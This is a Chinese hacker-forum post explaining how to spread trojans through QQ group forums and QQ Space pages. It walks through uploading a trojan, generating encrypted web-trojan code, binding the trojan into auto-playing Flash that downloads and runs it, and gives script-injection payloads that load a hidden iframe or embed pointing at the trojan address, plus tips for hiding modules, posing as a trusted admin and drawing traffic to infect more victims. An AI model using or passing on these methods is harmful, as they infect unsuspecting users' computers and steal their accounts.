文章作者:rosicky311
信息来源:黑基论坛
由于QQ在中国即时通讯软件的特殊地位,决定了其非凡的商业价值,但在这背后,也有更多的人开始深入研究QQ这款软件,以下介绍的是几种我所知道的利用QQ挂马的方法,技术含量不高,为什么利用QQ,完全是因为QQ的关注程度高~~~
1QQ群内挂马
⑴前阵子,群内发马闹的挺火,不过后来由于用的人多了,知道的人也多了,再加上QQ安全中心的默认设置的关系,这样发马的成功率已经非常低了~~当然,也不排除有些刚刚入门的朋友还会继续利用这个不怎么高明的手段来种马
⑵群内挂马是现在利用比较多的,可以直接将木马的服务端程序挂到群共享,不过此种方法也比较好确认,一般的群管理员都可以发现,一个几十K的可执行文件,有点网络基础的人都知道应该注意~~
⑶群内论坛发马,这个的隐蔽性相对于前两种来说就好多了,详细讲一下这个操作吧~~
在挂马前,首先准备木马,(废话~,没马挂什么~~)至于什么马完全根据您个人喜好了,我不多介绍了,生成木马服务端程序后,(暂定名为123.exe),将服务端上传到自己的网盘里之后得到地址,比如
找一个网页木马生成器(个人推荐南域剑盟的),在中间的URL添入上面的连接地址,之后点生成,可以在生成器的目录里出现一个文本,打开文本之后,复制文本内的代码,(南域的这个生成器生成的代码是加过密的,所以一般人很难看出来),复制所有代码,然后将代码插入到任意一个正常的网页中,就哦了~~注意:在正常的网页中,插入代码位置一般位于“<body></body>”标记中间
还有个方法是利用群论坛可以加FLASH的设置来挂马,在以前的群论坛里只要发个图就可以挂马,可现在新版的QQ不支持了~哎郁闷~~不过FLASH还是可以的~
动手前,下载一个FLASH到本地,打开SWF插马工具,在插入代码中插入上面木马的那个地址,,之后生成新的FLASH,这样只要对方打开FLASH,自动访问木马并在后台下载运行木马。到此之后的工作就简单多了,到群内论坛发表一篇帖子,然后插入已经绑好马的FLASH就大功告成了~~当别人看文章的时候,自动播放的FLASH就会让我们肉鸡多多了~
⑷补充几点,为加强稳定性,应该尽量做好隐蔽工作,不能做的太明显,个人建议,最好是群的管理员,一是别人信任度高,2是可以随意在内对群进行设置,呵呵,这可是挂网页马最好的地方~~~还有,加FLASH的时候,最好发的文章和FLASH是配套的,这样就很少有人怀疑了~~呵呵~~
2QQ空间挂马
⑴18号TX发了通知,宣称一些人利用QQ空间挂马,盗取他人QQ号码,为防止恶意传播,暂停自定义代码一个月,哎,其实说实话,用空间挂马的人少的可怜,我不知道为什么,应该是个不错的选择,可是很少人用,我在这做下介绍,希望一个月恢复空间自定义代码的时候还可用~
当然,如果不可用了,就当做下研究~~~
空间挂马和群挂马基本一样,也有两种选择,一是网页,二是FLASH,以前的方法是利用代码,CTRL+J打开自定义,去掉两个HTTP://,之后在评论内加代码。空间3.0由于不支持拖拽模块到屏幕中心外面,只能换个方法:把新模块弄小点,然后放在一个原有的大模块之上,比如日记,然后点自定义,模块管理,取消日记在把日记点出,这样新的模块就被“压”在了日记下面,达到了效果~~~
代码如下:
网页:<divid=DI><imgsrc="javascript:DI.innerHTML='<iframesrc=木马地址width=190height=190marginwidth=0marginheight=0hspace=0vspace=0frameborder=0scrolling=no></iframe>'"style=display:none></div>
FLASH:<imgsrc="javascript:document.getElementById('Mlogo').innerHTML+='<divstyle=\'position:absolute;top:0;left:0;\'><EMBEDsrc="/\'"地址\'quality=highwmode=\'transparent\'WIDTH=\'925\'HEIGHT=\'655\'TYPE=\'application/x-shockwave-flash\'></div>';"><imgsrc="javascript:initd.style.filter='alpha(opacity=90)';"style=display:none>
⑵对于以上的方法,这一个月可能用不了,不过下面的方法绝对可用~
新版的3.0空间现在虽然加不了代码,可仍然可以新建模块,并支持FLASH直接上传,呵呵,说到这,您应该知道我接下来要做什么了吧??哈~~
最后补充下,为了隐蔽性更好,可以将空间内的新模块隐藏,这样就神不知鬼不觉了~~~
还有现在有很多网站开始做空间互访的那个服务~~~呵呵~
如果你将你挂了马的空间申请了互访~~一天至少200的流量~~~~
呵呵想想就诱人啊~~~
其实以上所写的关于QQ群和空间的挂马方法很简单,只要你肯动手,我保证你肉鸡不断,还不敢快动手尝试下??~~~
当前位置:
